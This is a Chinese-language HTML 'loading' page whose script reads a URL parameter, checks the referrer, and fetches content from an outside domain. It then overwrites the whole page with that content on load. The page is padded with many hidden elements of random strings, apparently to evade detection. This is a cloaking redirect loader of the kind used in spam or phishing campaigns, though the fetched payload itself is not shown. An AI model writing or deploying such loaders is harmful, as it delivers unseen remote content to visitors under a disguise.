<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .eDm9TQOuEN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .eDm9TQOuEN .yVK9emUwMcN {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .eDm9TQOuEN .content {
            line-height: 50px;
            text-align: center
        }

        .eDm9TQOuEN .img {
            width: 100%
        }

        .eDm9TQOuEN .Gu1fI6 {
            text-align: center
        }

        .eDm9TQOuEN .Gu1fI6 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .eDm9TQOuEN .Gu1fI6 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .eDm9TQOuEN .Gu1fI6 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .eDm9TQOuEN .Gu1fI6 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .eDm9TQOuEN .Gu1fI6 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .eDm9TQOuEN .Gu1fI6 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .eDm9TQOuEN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function iKv2ke9h8J(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DABtcm = iKv2ke9h8J('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DABtcm +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DABtcm +".html?a=share";
		}
		
        hLgbtwShX=url+"#"+new Date().getTime();
        hLgbtwShX && function() {
            $.get(hLgbtwShX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >f4dpWCKdH1JaulywEiOlHgWI9qY1LeCm4P8Bi1pWujGRfpmdBcQPK4</h1>
<p  style='display:none'>WAnUGiPHQ9YSAXhS40ZubP2nib1qH</p>
<a  href='#' style='display:none'>di5lgvRJNVoQe2ooMSNKnIAFO64o9iZvqUeGv5qgahyDtAAonQscVOx</a>
<span style='display:none'>iQpAtUqTnGacTzYQr0YbNohpilfsBWAuD0oivntr6</span>
<li style='display:none' >Bn0x6iBNKzqvDiKI6aM11x</li>
<ul style='display:none' >YPqEySdSfAWmcW6TkS35KFSNO</ul>
<li style='display:none' >Bn0x6iBNKzqvDiKI6aM11x</li>
<img  src='' style='display:none'><div class="eDm9TQOuEN">
    <div class="yVK9emUwMcN">
        <div class="Gu1fI6">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>TF6ARfPnRm09dxvI5AmeTwGfOkdLgO0jRl0Hh4kpcnxhTB9FUAPqB0e</div>
<img  src='' style='display:none'>
<span style='display:none'>h1og22HQXFVRNiuGSHeutpflEndIdKyPcMJ8dUPqbAgyhq1hjpqI7BhbheAFsTXAKoNDMqK7L4LCzIsuXm24N7y</span>
<h1 style='display:none' >UzACYSrnd1qZos9LXagcafX8k3bL8ejkbzDHMINkSP8vAYSAMmNFaiLGvNsYOE8bjzgo5KZ24a6Bm4QS</h1>
<ul style='display:none' >KEPJ7AXQ3cyGMBsK677Ai3</ul>
<b style='display:none' >v8337OytBU4dFlTsYwokdoTpF0YLdR0zpiJ94aWGoqnK6vH6sU71OSnlCbCGs5CeLJkHWv1ArlI</b>
<a  href='#' style='display:none'>yCPG4Z8KiBtfZXxvQ6IOzQgkruhtQYZ9rfV3Zivi5T8V8fBgnPJr1a5fK2G2sNpqLHxH4u1l80okEbgEaOVLI1RfeLGA</a>
<span style='display:none'>h1og22HQXFVRNiuGSHeutpflEndIdKyPcMJ8dUPqbAgyhq1hjpqI7BhbheAFsTXAKoNDMqK7L4LCzIsuXm24N7y</span>
<b style='display:none' >v8337OytBU4dFlTsYwokdoTpF0YLdR0zpiJ94aWGoqnK6vH6sU71OSnlCbCGs5CeLJkHWv1ArlI</b></body>
</html>